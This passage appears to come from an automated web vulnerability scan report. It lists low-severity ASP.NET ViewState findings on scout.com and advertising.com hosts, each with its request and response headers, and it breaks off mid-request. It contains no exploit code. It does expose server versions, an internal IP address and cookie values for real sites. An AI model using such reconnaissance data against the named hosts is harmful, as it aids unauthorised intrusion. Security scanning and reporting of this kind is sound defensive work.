14.4. http://jcfootball.scout.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jcfootball.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.5. http://mlb.scout.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mlb.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.6. http://p.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: p.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.7. http://preps.scout.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://preps.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.8. http://r1-ads.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1398
Date: Sun, 30 Jan 2011 02:18:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.9. http://r1.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

14.10. http://recruiting.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.11. http://rss.scout.com/rss.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=900
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263787

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.12. https://secure.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Request

GET /a.z HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.13. http://www.scout.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.14. http://www.scout.com/3/college-links.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/college-links.html

Request

GET /3/college-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.15. http://www.scout.com/3/company.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/company.html

Request

GET /3/company.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.16. http://www.scout.com/3/fair-use.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/fair-use.html

Request

GET /3/fair-use.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.17. http://www.scout.com/3/jobs.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/jobs.html

Request

GET /3/jobs.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.18. http://www.scout.com/3/privacy-policy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/privacy-policy.html

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.19. http://www.scout.com/3/recruiting-links.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/recruiting-links.html

Request

GET /3/recruiting-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.20. http://www.scout.com/3/security-information.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/security-information.html

Request

GET /3/security-information.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.21. http://www.scout.com/3/terms-of-service.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/terms-of-service.html

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53554

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.22. http://www.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:11 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:11 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22873

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.23. http://www.scout.com/search.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:31 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14267

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...

14.24. http://www.scout.com/widgets/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /widgets/

Request

GET /widgets/ HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
